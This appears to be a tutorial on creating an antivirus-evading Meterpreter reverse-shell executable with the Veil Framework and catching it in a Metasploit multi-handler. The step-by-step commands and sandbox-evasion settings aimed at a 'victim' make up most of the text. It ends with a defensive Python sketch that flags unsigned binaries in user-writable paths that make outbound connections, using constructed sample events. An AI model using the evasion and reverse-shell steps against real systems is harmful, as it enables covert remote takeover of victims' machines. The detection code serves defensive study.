Creating an Undetectable Payload

To create an undetectable payload using the Veil Framework, you must first launch the application by typing veil in your terminal. Once the main menu appears, enter use 1 to access the Evasion menu, which contains the tools specifically designed for bypassing antivirus software. To see a complete list of available payload types, type list. For high success rates against modern security suites, it is recommended to use payloads written in languages like Go or Python, such as go/meterpreter/rev_tcp. Enter the corresponding number or the full path of the payload you wish to use.

After selecting your payload, you must configure the connection settings by entering set LHOST followed by your IP address and set LPORT followed by your desired listening port. To further increase the chances of remaining undetected, you can modify optional settings such as SLEEP to delay execution or processors to ensure the file isn’t running in a basic sandbox. Once your configuration is complete, type generate to build the executable. You will be prompted to name your file; after providing a name, Veil will compile the payload and provide the directory path where the new executable is stored, typically within the veil-output folder.

To catch the connection from your new undetectable payload, open a second terminal and launch Metasploit by typing msfconsole. You must manually set up a multi-handler by entering use exploit/multi/handler. Set the payload type to match exactly what you generated in Veil, for example, set PAYLOAD windows/meterpreter/reverse_tcp. Match the LHOST and LPORT values to those used during the generation phase and then type run or exploit. Once the victim executes the Veil-generated file, the antivirus will likely remain silent, and a Meterpreter session will be established in your Metasploit console.
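On the defending side, the flow above still produces two observable events even when the file itself passes a signature scan: an unsigned executable starting from a user-writable path, and that same process opening an outbound connection, possibly long after it started if a SLEEP delay was set. The sketch below is an added example, not part of the original page or of any product; the record types, field names and sample events are constructed for illustration, and it correlates by PID rather than by a short time window so a delayed connection is still matched.

```python
from dataclasses import dataclass
from ipaddress import ip_address

# Hypothetical telemetry records; field names are constructed, not a real EDR schema.
@dataclass(frozen=True)
class ProcStart:
    ts: float      # seconds since epoch
    pid: int
    image: str     # full path of the executable
    signed: bool   # True if the image carries a trusted signature

@dataclass(frozen=True)
class NetConn:
    ts: float
    pid: int
    dst_ip: str
    dst_port: int

USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")

def suspicious_callbacks(procs, conns):
    """Return (ProcStart, NetConn, delay_seconds) for each outbound connection
    made by an unsigned binary running from a user-writable path.
    Matching is by PID with no upper time bound, so a process that sleeps
    before connecting is still tied to its start event."""
    by_pid = {}
    for p in sorted(procs, key=lambda p: p.ts):
        by_pid.setdefault(p.pid, []).append(p)
    hits = []
    for c in sorted(conns, key=lambda c: c.ts):
        if ip_address(c.dst_ip).is_loopback:
            continue
        # Most recent start with this PID at or before the connection (handles PID reuse).
        starts = [p for p in by_pid.get(c.pid, []) if p.ts <= c.ts]
        if not starts:
            continue
        p = starts[-1]
        if not p.signed and any(d in p.image.lower() for d in USER_WRITABLE):
            hits.append((p, c, c.ts - p.ts))
    return hits

# Constructed sample events (documentation-range addresses).
PROCS = [
    ProcStart(1000.0, 4120, r"C:\Users\alice\Downloads\viewer.exe", False),
    ProcStart(1005.0, 5300, r"C:\Program Files\Vendor\updater.exe", True),
    ProcStart(1010.0, 6100, r"C:\Users\alice\AppData\Local\App\app.exe", True),
]
CONNS = [
    NetConn(1300.0, 4120, "203.0.113.10", 8081),  # 300 s after process start
    NetConn(1006.0, 5300, "198.51.100.7", 443),   # signed, Program Files
    NetConn(1011.0, 6100, "198.51.100.9", 443),   # signed, user profile
    NetConn(1012.0, 6100, "127.0.0.1", 9000),     # loopback, ignored
]
```

In the constructed data only PID 4120 is returned, with a delay of 300 seconds between process start and connection.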
